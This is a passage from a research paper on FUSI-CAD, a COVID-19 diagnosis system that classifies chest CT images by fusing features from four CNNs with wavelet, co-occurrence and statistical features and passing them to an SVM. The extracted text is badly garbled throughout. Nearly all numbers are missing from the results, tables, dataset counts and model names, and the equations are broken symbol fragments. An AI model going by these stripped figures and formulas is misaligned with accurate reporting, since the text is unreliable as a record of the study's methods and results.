authors in fang et al. ( ) applied radiomics analysis from a manually delineated region of interest (roi) ct images to diagnose covid- . afterward, unsupervised consensus clustering was used to choose significant features. finally, a support vector machine (svm) classifier was used to classify covid- . this study achieved an auc of . ( . %). the benefit of this study is using radiomics quantitative analysis as a feature extractor, which is considered as a powerful extractor along several medical domains (lambin et al., ; kolossváry et al., ). however, the main drawback of fang et al. ( ) method is that the authors used only handcrafted features and discarded the advantages of dl techniques, and therefore, they did not attain high performance. li et al. ( ) proposed a technique that depends on resnet- cnn to classify covid- . the sensitivity, specificity, and auc produced were %, %, and . ( %), respectively. the privilege of such a technique is that it used large amount of images. moreover, it utilized a heatmap to picture the important areas in the images in the classification. nevertheless, the heatmaps are not yet sufficient to capture what distinctive features are utilized by the model to differentiate between covid- and non-covid- . furthermore, ardakani et al. ( ) compare the performance of popular cnn to differentiate covid- from non-covid- patients. the results showed that resnet- and xception cnns have the highest performance. the accuracy, auc, sensitivity, and specificity obtained by resnet- cnn were . %, . ( . %), %, and . %, respectively. however, the xception cnn attained an accuracy of . %, an auc of . ( . %), a sensitivity of . %, and a specificity of %. the main advantages of ardakani et al. ( ) method are using very high-resolution images and splitting each image in the dataset into several patches that are then used to ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ train the cnn. the authors in singh, kumar & kaur ( ) introduced a novel cnn and tuned its initial parameters by using a multi-objective differential evolution (de) method, which was the key privilege of their cad system. the de algorithm has confirmed its effectiveness in various domains (zhang & sanderson, ). this evolution technique guarantees that the individual that has superior merits is left as a portion of the population and fragile individuals are detached with each iteration (hancer, xue & zhang, ). the results obtained were almost %. however, the limitation of singh, kumar & kaur ( ) and ardakani et al. ( ) study is they did not compare the performance of their cad system with that of the radiologist. he et al. ( ) employed several cnns to classify covid- cases. the best performance was achieved by densenet- where, the accuracy and auc were % and . ( %), respectively. the densenet is a novel cnn architecture, which can perform well in case of trained with a huge number of images; however, it has a high complexity and a large number of layers, which increase the chances of overfitting in case of trained with inadequate number of images. hasan et al. ( ) proposed a hybrid approach based on cnn, q-deformed entropy, and long-short-term-memory (lstm) network and accomplished an accuracy of . %. the advantage of this method is that the authors constructed a new cnn with few number of convolutional layers to decrease the over-fitting by reducing the cnn construction complexity. they also utilized a new feature extractor called q-deformed entropy, which is a textural analysis method capable of providing a major benefit in medical image classification. in addition, the q-deformed entropy is an entropy based technique that can detect small alterations in the image’s intensity values, along with sharpening the texture details (al-shamasneh et al., ). the authors in bai et al. ( ) employed efficientnet-b to identify covid- with an accuracy of %, auc of . ( %), sensitivity of %, and a specificity of %. the study of bai et al. ( ) has compared the performance of the cad system based on ai techniques with manual diagnosis by radiologists. it proved that the ai assistance had enhanced the radiologists’ performance in diagnosing covid- cases, but there could be a bias as a result of the radiologist’s evaluation of the same suspects twice, primary without, and then with ai assistance, whereas the authors in amyar, modzelewski & ruan ( ) used two u-nets to diagnose covid- . the first network was used to segment the lung from the rest of the image, while the other one for classification. the accuracy, auc, sensitivity, and specificity achieved were %, . ( %), %, and %, respectively. the benefit of this method is using a multi-task learning method, which fuses several portions of information from different tasks to enhance the performance of the cad system and its capability to better generalize. u-net was used as well in chen et al. ( ) to discriminate covid- and non-covid- . the results obtained showed an accuracy of . %, a sensitivity of %, and a specificity of . %. the reason of such good results is the huge number of images used to train their u-nets. a summary of similar studies is shown in table . as it is obvious from the table that most of the related work is based on dl techniques, which either employing a single cnn or combining two cnns where the first cnn is used for segmentation and the other ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a summary of recent similar related studies. paper dataset method results butt et al. ( ) covid- others resnet- and resnet- accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % li et al. ( ) covid- , others resnet- accuracy = . % auc = . ( %) sensitivity = % specificity = % bai et al. ( ) covid- others efficientnet-b accuracy = % auc = . ( %) sensitivity = % specificity = % he et al. ( ) covid- others densenet- accuracy = % auc = . ( %) amyar, modzelewski & ruan ( ) covid- others two u-nets accuracy = % auc = . ( %) sensitivity = % specificity = % ardakani et al. ( ) covid- others resnet- accuracy = . % auc = . ( . %) sensitivity = % specificity = . % xception accuracy = . % auc = . ( . %) sensitivity = . % specificity = % chen et al. ( ) , covid- , others u-net++ accuracy = . % sensitivity = % specificity = . % zheng et al. ( ) covid- others u-net and cnn accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % jin et al. ( b) covid- others u-net and resnet- accuracy = . % sensitivity = . % specificity = . % hasan et al. ( ) covid- others cnn,q-deformed entropy, and lstm accuracy = . % jin et al. ( a) covid- , others deeplab-v and resnet accuracy = . % auc = . ( . %) sensitivity = . % specificity = . % song et al. ( b) covid- others resnet- accuracy = % auc = . ( %) sensitivity = % precision = % singh, kumar & kaur ( ) – cnn accuracy~ % wang et al. ( ) covid- others inception and adaboosted decision tree accuracy = . % auc = . ( %) sensitivity = % specificity = % fang et al. ( ) covid- , others radiomic feature extraction, clustering and svm auc = . ( . %) ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is for the classification and diagnosis of covid- . however, the process of fusing multiple cnns is not well examined in previous studies. moreover, almost all of the existing studies depend on dl only as a feature extraction, which may have some limitations regarding feature extraction complexity. feature extraction is a vital process for extracting important spatial variations of the image pixels. although, dl is considered a powerful tool for large- scale image classification and feature extraction, however, it could not be the ideal choice when the dataset available is not large containing a small number of images (nguyen et al., ). dl techniques may hardly employ heuristics to direct feature extraction for every particular task because of the automatic feature extraction procedure. they can also face the problem of overfitting when the training dataset is not large (zhang et al., ; nanni, ghidoni & brahnam, ). fusing dl and handcrafted features may improve the performance of the image classification problems (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). therefore, in this study, we proposed an efficient novel cad system called fusi-cad, which investigates the effect of fusing handcrafted features and dl features extracted from multiple cnns trained with covid- ct images. the proposed system as it will be discussed later consists of three stages: � stage ( )—deep features fusion: this is performed by extracting and fusing the deep features of the fine-tuned alexnet, googlenet, shufflenet, and resnet- cnn architectures. � stage ( )—handcrafted features fusion: this is accomplished by extracting and fusing three types of handcrafted (hc) features; the statistical features, discrete wavelet transform (dwt), and grey level co-occurrence matrix (glcm) features. � stage ( )—fusi-cad (dl and hc feature fusion): this is implemented by fusing the features of both stages ( ) and ( ). the fusi-cad system compares its performance with stages ( ) and ( ) to test the effect of fusing multiple dl features with three hc features on the performance of the cad system. the novelty of the fusi-cad system is concentrated in several contributions: � exploring various cnn based approaches different than that have been utilized in the literature for detecting the presence of covid- from chest ct images. � fusing features extracted from the deep layers of cnns to diagnose covid- patients, as the fusion of deep features was not examined in the literature. � combining powerful handcrafted features to diagnose covid- patients, as this was not examined in the literature. � comparing the usage of deep features with handcrafted features for diagnosing covid- with a dataset of few numbers of images. � a feature fusion based approach is proposed, which combines deep features from multiple individual cnns models with three powerful handcrafted features based on textural analyses, to produce a final accurate and efficient diagnostic tool even with a covid- dataset containing small number of images. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � developing a final fused model (multiple deep features and three handcrafted features), which is able to verify that each of the two feature extraction paradigms is capable of extracting information that is neglected by the other paradigm. � constructing a reliable model that is faster and more accurate than the conventionally used rt-pcr testing kit. methods and materials dataset description the dataset used is sars-cov- ct-scan dataset. it is acquired from a hospital in sao paulo, brazil, and permitted by their ethical committee. the description of this dataset is available in soares et al. ( ). the dataset contains ct-images of covid- positive cases for patients ( male + female) and ct-scans for non-covid- cases for normal patients ( male + female), which are covid- negative but may have other pulmonary illnesses. figure shows some samples extracted from the dataset representing ct images for covid- and non-covid- . convolutional neural networks convolutional neural network (cnn) is a branch of dl methods that are broadly used for resolving classification problems of medical images in health informatics field (jin et al., b; ravì et al., ). for this reason, four cnn architectures are employed in this article. any cnn involves several layers including; convolutional layers, pooling layers, and fully connected (fc) layers. in the first layer, several filters are convolved with the region of the input image corresponding to the same dimension of the filter. next, a feature map is created representing the position of the features in the original image. such features characterize the spatial information of the pixel values of the original input image. then, the pooling layer lowers the huge dimension of the feature map using a down sampling process. lastly, the fc layer accomplishes the classification procedure similar to the conventional artificial neural network (ann). cnn can be either used as a classifier or feature extractor. in this paper, four cnns are employed as feature extractors. such networks include alexnet (krizhevsky, sutskever & hinton, ) and (dirvanauskas et al., ), googlenet (szegedy et al., ), shufflenet (girshick et al., ) and resnet- (he et al., ) constructions. the architectures of alexnet, googlenet, shufflenet, and resnet- cnn are illustrated in figs. – , respectively. the cnn networks are trained using the imagenet dataset, which has . million natural images in , -labelled classes. the transfer learning technique is performed on these networks so that it can be used in any classification problem. this is implemented by replacing the last fully connected layer in any network by a new layer for the classification of two classes: covid- and non-covid- . to our knowledge and according to the literature these networks have not yet been employed as feature extractors to classify covid- . a summary of the architecture of the four networks is shown in table . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed computer-aided diagnosis system the proposed cad system consists of four steps, which are image enhancement, feature extraction, feature fusion, and feature classifications steps. in the image enhancement step, images were enhanced using an adaptive contrast enhancement method. figure alexnet cnn architecture. full-size doi: . /peerj-cs. /fig- figure googlenet cnn architecture. full-size doi: . /peerj-cs. /fig- figure samples of ct images (a)–(c) covid- ct images and (d)–(f) non-covid- ct images. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ afterward, in the feature extraction step, two types of features were extracted. first, four pre-trained cnns were constructed and used as feature extractors. these cnns include alexnet, googlenet, shufflenet, and resnet- architectures. second, three handcrafted (hc) feature extraction methods were employed to extract the features from the ct images. these handcrafted methods consist of statistical features and the textural analysis features; such as discrete wavelet transform (dwt) and grey level co-occurrence matrix (glcm). next, the feature fusion step, where features were fused in three stages; figure resnet- cnn architecture. full-size doi: . /peerj-cs. /fig- figure shufflenet cnn architecture. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � stage ( ) is the deep features fusion: in this stage, the deep features extracted from the four fine-tuned pre-trained cnn were fused. the influence of dl feature fusion was not examined in the diagnosis of covid- , therefore, the novel part is investigating the impact of dl fusion on identifying covid- patients. � stage ( ) is the handcrafted features fusion: this stage carried out a fusion from three hc feature extractors as mentioned previously. these features were not studied in the related work for coronavirus diagnosis and classification. therefore, the novel part is using the hc features in coronavirus diagnosis and investigating the effect of combining these three features on the classification results. � stage ( ) is the fusi-cad system: this stage was implemented by fusing the features of both the multiple dl features of stage ( ) and the fused handcrafted features of stage ( ). the fusi-cad system was conducted to verify that fusing the features of stages ( ) and ( ) can improve the diagnosis performance of covid- . to the best of our knowledge, the fusion of dl and hc features was not examined in related cad system discussing coronavirus diagnosis. finally, in the classification step, the fused features were used to construct classification models using a support vector machine (svm) with cubic kernel function to classify ct images into covid- or non-covid- . the framework of the proposed cad system is shown in fig. . the steps of the proposed cad system is discussed in detail in the following sub-sections. image enhancement step image enhancement is an important process to improve the image quality, contrast, and remove noise to help radiologists in identifying the abnormalities. there are several image enhancement methods; between them is the adaptive contrast enhancement method (ahe). ahe method has the ability to improve the local contrast and express more details in the image. in this study, the contrast-limited adaptive histogram equalization technique (clahe); a subclass of ahe is used to enhance the contrast of images (m.pizer et al., ; pisano et al., ). the clahe algorithm can be summarized as follows; (sahakyan, ) . split the original ct image into contextual areas, . find a local histogram for each pixel, table a summary of the architecture of the four pre-trained cnns used. cnn architecture number of layers input size output size alexnet × , × googlenet × , × shufflenet × × resnet- × × ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . bound this histogram established on the clip level, . reorganize the histogram using binary examination, and . get the enhanced pixel value by histogram integration. feature extraction step in this step, handcrafted features along with dl features are extracted. the details of the feature extraction step are illustrated in this subsection. handcrafted feature extraction texture analysis feature extraction methods are well-known techniques for mining features from medical images (castellano et al., ; kassner & thornhill, ; lahmiri & boukadoum, ; depeursinge, al-kadi & ross mitchell, ). such methods depend on the textural characteristics of the image. textural features extraction methods include the discrete wavelet transform (dwt), and the gray-level co-occurrence matrix (glcm). these techniques usually yield reasonable classification accuracy especially when they are combined (nailon, ; lahmiri & boukadoum, ). for this reason, they are used in this study to extract several subsets of features along with statistical features from the spatial domain. statistical features in this step, each image was divided into blocks of size × . afterward, eight statistical features were calculated from each block of an image in the spatial domain. next, these features from all blocks were combined in one feature vector. these features include entropy, mean, standard deviation, variance, root mean square (rms), minimum, maximum, and range as defined from eqs. ( )–( ). the size of the statistical features extracted was . entropy ¼ � xn� i¼ pri � log pri ( ) where n is the number of grey levels. pri is the probability of a pixel having gray level i. meanðmzÞ ¼ fg xfg i:j¼ pz i:jð Þ ( ) where pz (i, j) is the pixels value in the image block z, f × g is the size of each block z. standard deviation szð Þ ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi fg xfg i:j¼ pz i:jð Þ � mzð Þ vuut ( ) variance s z � � ¼ fg xfg i;j¼ pz i:jð Þ � mzð Þ ( ) ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rms ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffixf:g i:j¼ mz i:jð Þj j vuut ( ) range ðrzÞ ¼ pzmax � pzmin ( ) where pzmax and pzmin are the maximal and minimal pixel values in an image block z. discrete wavelet transform discrete wavelet transform (dwt) is a common approach to extract features in the medical image processing field (lahmiri & boukadoum, ; srivastava & purwar, ). dwt provides time-frequencies demonstration by decomposing an image using a set of orthogonal basis functions (ortho-normal). dwt has a set of transforms each with a number of wavelet basis functions. in the case of -d images, one level -d dwt is employed; where a d-dwt is applied for every dimension distinctly to attain four sets of coefficients. the four coefficients generated from the -d dwt are the approximation coefficients ca , and three detail coefficients cd . the detail coefficients comprise the horizontal, vertical, and diagonal coefficients correspondingly. multilevel -d dwt may be used as well to accomplish multiple decomposing levels. the multilevel decomposition is achieved by convolving the approximation components created in the preceding decomposition level into several high and low-pass filters (mallat, ; anitha & murugavalli, ). an example of a first level decomposition for a non-covid- sample is illustrated in fig. c. figure the framework of the proposed cad system. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the proposed fusi-cad system, -decomposing levels of dwt are applied to the images. the th decomposition level of d-dwt usually enhances the performance when used with medical as stated in chato, chow & latifi ( ) and this is proved in the results section. in this paper, haar wavelet was employed as a wavelet basis function. after performing four-level decompositions, the approximate, horizontal, vertical, and diagonal coefficients of the fourth decomposing stage were extracted to form a feature subset. the number of features extracted from the fourth level of dwt was . grey-level co-occurrence matrix grey-level co-occurrence matrix (glcm) approach is a common method for pulling out texture features from images (haralick, shanmugam & dinstein, ). glcm method is used to extract surface features such as; contrast, homogeneity, correlation, and energy figure the illustration of the handcrafted features. (a) original non-covid- sample, (b) enhanced image using clahe method, (c) the first level dwt decomposition and (d) glcm features. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the images. glcm features are determined using eqs. ( )–( ). the length of the features extracted using glcm was . an example of the glcm features of a non-covid- sample is shown in fig. d. contrast ¼ xg� n¼ n xf i xg j p i:jð Þ ( ) : i � jj j ¼ n ( ) correlation ¼ xf i xg j i � jf g � p i:jð Þ � mx � my n o sx � sy ( ) energy ¼ xf� i xg� j p i:jð Þð Þ ( ) homogeneity ¼ xf� i xg� j p i:jð Þ þ i � jj j ( ) where p (i, j) is a marginal joint probability grey-level co-occurrence matrix. deep learning feature extraction step convolutional neural networks that were pre-trained may be learned from the ct images to either carry out classification or feature extraction tasks. in the feature extraction task, useful deep features were taken out from one of the layers of the cnns. in this study, instead of using the cnns as classifiers, dl features were extracted from the “fc ,” the dropout layer named “pool drop × s ,” the “global average pooling d layer” (fifth pooling layer), and “node ” of the fine-tuned alexnet, googlenet, resnet- , and shufflenet architectures, respectively. the length of dl features extracted from each cnn was , , , , , and for alexnet, googlenet, resnet- , and sufflenet respectively. feature fusion step the feature fusion step consists of three stages. in the first stage, all dl features extracted from the four cnns were combined in a concatenated manner. the number of dl features after fusion was , . in the second stage, all handcrafted extracted using dwt, glcm, and statistical methods were fused. the length of the feature space for the handcrafted features was . as mentioned in related image classification problems that combining dl and handcrafted features may enhance the performance of classification problems (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). thus, in the third stage, the fusi-cad system was constructed by fusing both the dl and hc features. to examine the effect of this fusion on the performance of fusi-cad system in distinguishing between covid- and non-covid- cases. the performance of the fusi-cad system was compared with the first two stages to test the effect of fusing multiple dl features with three hc features on the performance of the cad system. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classification step this step is responsible for classifying ct images to covid- and non-covid- using the svm classifier. svm is a machine learning method that uses statistical learning theory to perform classification. svm classifier is used to construct the optimal hyperplane with the highest margin to separate between two groups of ct datasets. support vectors represent the data points, which exist on the margin. svm employs a kernel function to convert the feature space into a new domain to make the separation between the two classes of the datasets easier (wagh & vasanth, ). in this paper, the cubic kernel function is chosen as it achieved the highest results. performance evaluation the performance of the proposed fusi-cad system is calculated with several metrics such as accuracy, sensitivity, precision, specificity, f -score, diagnostic odds ratio (dor), and area under receiving operating characteristics (auc). the equations used to calculate such metrics are shown below in eqs. ( )–( ). accuracy ¼ tp þ tn tn þ fp þ fn þ tp ( ) sensitivity ¼ tp tp þ fn ( ) specificity ¼ tn tn þ fp ( ) precision ¼ tp tp þ fp ( ) f � score ¼ � tp � tpð Þ þ fp þ fn ( ) dor ¼ tp � tn fp � fn ( ) where tp is the sum of covid- images that are properly classified, tn is the sum of non-covid- images that are properly classified. fp is the sum of non-covid- images that are not correctly classified as covid- . fn is the sum of covid- images that are not correctly classified as non-covid- . experimental set up parameter setting some parameters are adjusted for the pre-trained cnns. the mini-batch length and validation frequency are and correspondingly the total epochs are equal to and the primary learning rate for the four cnns is − . the l-regularization is . . however, all other parameters are not altered. these arrangements are to approve that the ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameters are modified for classifying medical ct images of covid- . stochastic gradient descent with momentum (sgdm) is applied for the optimization. to verify the performance of the proposed fusi-cad system, -folds cross-validation is employed. augmentation augmentation is an essential process that is usually made to enlarge the size of the dataset, which has a small number of images. this procedure is done as most likely the classification model is trained with an insignificant amount of data over-fit (ravì et al., ). overfitting means that the model will remember the details of the training set and will not execute well on testing sets. the augmentation method used to generate new lung ct images from the training data in this paper are translation, flipping, scaling, and rotation. every original ct image was flipped then translated and scaled in x and y-directions with pixel range (− to ) and scale range ( . – . ), respectively. furthermore, the images were rotated with an angle range ( – ) degrees. results this study proposed a novel cad system called fusi-cad based on the fusion of multiple cnns and three handcrafted features to classify covid- and non-covid- cases. in this section, the classification results of the three stages of the features fusion are presented. deep features fusion stage in this stage, the deep features from alexnet, googlenet, shufflenet, and resnet- , cnns were extracted, combined, and used to construct a cubic svm classifier. the performance of the cubic kernel svm classifier trained with the fused deep features was compared to the one constructed with dl features extracted from the four cnns individually as shown in table . for the single deep feature classification, the classification scores for resnet- cnn features achieved the highest scores compared to the other cnn features. this was clear from table , as the accuracy and auc achieved were . % and . ( %), respectively. however, the sensitivity, specificity, precision, and f score attained to . ( . %) each. moreover, the classification scores for the individual features of the googlenet and shufflenet cnns were almost the same. this was because the accuracy achieved was . % and . % for googlenet and shufflenet cnns, respectively. in addition, the auc and the sensitivity were the same for both features achieving . ( %) and . ( %), respectively. however, there was a slight change in the scores of the specificity, precision, and f score for the two cnns features. the scores achieved for googlenet and shufflenet cnns features were . ( . %) and . ( . %), . ( . %) and . ( %), and . ( . %) and . ( . %) for the specificity, precision, and f score, respectively. conversely, the alexnet cnn individual features achieved the least classification scores achieving . %, . ( %), . ( %), . ( . %), . ( . %) and . ( . %), for accuracy, auc, sensitivity, specificity, precision, and f score, respectively. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the other hand, for the deep feature fusion, it was clear that the fusion had improved the performance metrics of the svm classifier compared to each dl features. this was because the accuracy, auc, sensitivity, specificity, precision, and f score increased to . %, . ( %), . ( . %), . ( %), . ( %), and . ( . %), respectively. furthermore, the dor had increased to , which was also greater than dors of the alexnet, googlenet, shufflenet, and resnet- respectively. handcrafted features fusion stage three types of handcrafted (hc) features were extracted from the ct images; the statistical features, dwt, and glcm features. as stated previously, eight statistical features; entropy, mean, variance, standard deviation, minimum, maximum, and range were mined from the images. afterward, these features were fused in one feature vector and classified using the cubic kernel svm classifier giving an accuracy, auc, and sensitivity of . %, . ( %), and . ( . %), respectively. additionally, the specificity and precision accomplished the same score of . ( %). however, the f score and dor achieved . ( . %) and . , respectively. furthermore, for the dwt features, four-level decomposition was performed on the ct images. the classification scores of the four levels of dwt were shown in fig. . the classification scores of the coefficients of the fourth level dwt decomposition attained the highest scores compared to the other three levels, as it was clear in fig. . the accuracy and auc achieved were . % and . ( %), respectively. moreover, the glcm features were extracted achieving an accuracy, auc, sensitivity, specificity, precision, f score, dor of . %, . ( %), . ( . %), . ( %), . ( %), . ( . %) and . , respectively. afterward, the three hc features were fused and classified using a cubic svm classifier. since the coefficients of the fourth level dwt achieved the highest scores comparing to the other three dwt levels. therefore, these features along with the glcm and statistical features were fused forming one feature vector and used to construct a cubic svm classifier. this svm performance was compared with the performance of the svm classifiers constructed separately with the features extracted for each of the four levels of dwt as well as glcm features and the statistical features as shown in table . table the evaluation metrics for the cubic kernel svm classifier constructed with the fused dl features compared to svm classifiers trained with each dl feature. cnn accuracy (std) auc (std) sensitivity (std) specificity (std) precision (std) f score (std) dor (std) alexnet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) googlenet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) shufflenet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) ( ) resnet- . % ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) , . ( . ) dl fusion . % ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) , ( ) note: bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the fusing of the three hc features had improved the performance of the svm classifier, as it was clear in table . the accuracy and auc increased to % and . ( . %). moreover, the sensitivity and specificity were improved as well yielding to . ( . %) and . ( . %). in addition, the precision and f score were raised to . ( . %) and . ( %). furthermore, the dor had increased to , which was greater than the dors of each hc features. deep and handcrafted features fusion stage (fusi-cad system) the fusi-cad system proposed the fusion of dl and hc features to examine the effect of this fusion on the performance of covid- diagnosis. table shows a comparison of dl, hc features fusion, and the proposed fusi-cad system (dl and hc features fusion) using a cubic kernel svm classifier. all the classification results achieved by the fusi-cad system increased, as it was obvious in table . the accuracy, sensitivity, specificity, precision, and f score increased table the evaluation metrics for the svm classifier constructed with each individual and fused hc features. handcrafted (hc) features accuracy (std) auc (std) sensitivity (std) specificity (std) precision (std) f score (std) dor (std) statistical features . % ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) fourth level dwt . % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) glcm features . % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) hc fusion % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) , . ( , . ) note: bold values indicate the highest results. figure the classification scores for the four levels of dwt decomposition. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to % each. in addition, the auc rose to . ( %), as shown in the computed roc curve in fig. . a comparison between the accuracies of svm classifiers constructed using individual dl features, individual hc features, dl feature fusion, hc feature fusion, and the proposed fusi-cad system is given in fig. . as shown in fig. the accuracy of the proposed fusi-cad system attained the highest score. discussions currently, the novel coronavirus is considered one of the global terrific health crisis. a quick and accurate diagnostic tool is vital to manage the propagation of this pandemic disease and assist radiologists in the diagnosis especially in high load conditions. the rt-pcr laboratory test is a well-known method to diagnose covid- , but it has poor sensitivity and inadequate availability. the test is also expensive, time-consuming, and requires a well-equipped laboratory for analysis (which is the main challenge particularly in developing countries). therefore, a faster and efficient alternative diagnostic tool is of crucial need to help the front-line professionals to attain a fast and precise diagnosis. medical imaging techniques such as ct is an effective tool to visualize the lungs and can assist the early diagnosis of covid- . however, it cannot achieve efficient diagnosis when used alone because of the likeness between patterns of the novel coronavirus and other types of pneumonia, which could confuse specialists and lead to misdiagnosis. on the other hand, cad systems based on ai techniques have proven to have stronger discriminating ability to distinguish covid- and non-covid- patients, and more accurate and faster capabilities in the diagnosis the covid- compared to the pathogenic exam, which consequently lessens the time desired for disease control (butt et al., ; shi, han & zheng, ). in this study, a faster and more accurate resolution was proposed instead of the rt-pcr test. the proposed resolution presented a novel cad system called fusi-cad system. table a comparison between the classification scores obtained by the dl, hc feature fusion, and the fusi-cad system. accuracy (std) ( % confidence interval) auc (std) ( % confidence interval) sensitivity (std) ( % confidence interval) specificity (std) ( % confidence interval) precision (std) ( % confidence interval) f score (std) ( % confidence interval) dor (std) ( % confidence interval) dl fusion . % . . . . . , ( . ) ( ) ( . ) ( ) ( ) ( ) ( ) [ . – . ] [ – ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , – , ] hc fusion % . . . . . , . ( . ) ( . ) ( . ) ( . ) ( . ) ( . ) ( , . ) [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , . – , . ] fusi-cad % . . . . . , ( . ) ( ) ( ) ( ) ( ) ( ) ( ) [ . – . ] [ – ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , – , ] note: bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. recent studies based on related image classification problems have suggested that fusing dl and handcrafted features can improve the performance of the classification model (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). therefore, the fusi-cad system was based on the fusion of multiple dl features and handcrafted features extracted from ct images to investigate the effect of this fusion on the performance of the cad system. moreover, the proposed cad system examined the influence of fusing multiple dl features extracted from four pre-trained cnns on the classification performance as in stage ( ). furthermore, it studied the impact of fusing three handcrafted features such as dwt, glcm, and statistical features on the classification performance as well as illustrated in stage ( ). the proposed system is considered an important trial involving a simple to set up, low cost, and automated cad system that can attain an accurate, effective, and fast diagnostic tool. throughout this tough period of the global pandemic, the proposed fusi-cad system has huge potential to be considered as a covid- diagnostic tool. it can attain early diagnosis of the novel corona disease, thus averting its rapid propagation. the fusi-cad system is an ai technique, which has a more powerful ability to distinguish between covid- and non-covid- ct images than manual diagnosis (butt et al., ). the superiority of ai techniques were confirmed in related studies by various authors (bai et al., ; chen et al., ; ardakani et al., ), who compared figure the roc curve for the fusi-cad system. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the accuracy of their cad systems based on ai techniques, with the accuracy achieved by a manual diagnosis of radiologists without the aid of a cad system. the performance attained by these studies verified that the ai based cad systems were greater than the manual diagnosis by radiologists. the authors in bai et al. ( ) indicated that their cad system based on ai reached higher test accuracy ( % vs. %), the sensitivity of ( % vs. %), and specificity ( % vs. %) than radiologists. similarly, in ardakani et al. ( ) the results attained by the radiologist were worse than the authors’ proposed ai-based cad system, with a sensitivity of ( . % vs. . %), a specificity of ( . % vs. . %), and an accuracy of ( . % vs. . %). whereas, in chen et al. ( ), the authors indicated that their ai based cad system is capable of lowering the manual radiologist’s diagnosis time by %. this study proved that dl feature fusion could enhance the diagnosis of covid- as the accuracy of the svm classifiers had increased to . %, which was higher than that of the individual dl features extracted from alexnet, googlenet, shufflenet, and resnet- cnns as shown in fig. . moreover, the study indicated that fusing the handcrafted features had improved the accuracy of the svm classifier to reach %, which was better than that of the dwt, glcm, and statistical features separately. furthermore, the performance of the proposed fusi-cad system verified that fusing dl and hc features had successfully improved the accuracy to reach %, which was higher than the other individual features of the dl methods, hc methods, the fused dl features, and fused hc features as shown in fig. . the fusi-cad system performance was compared with recent related studies based on the same dataset to verify its competence. table shows a comparison between the performance metrics of the proposed fusi-cad system and recent related studies based figure comparisons of individual dl features, individual handcrafted features, dl feature fusion, handcrafted feature fusion and the proposed fusi-cad system. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . 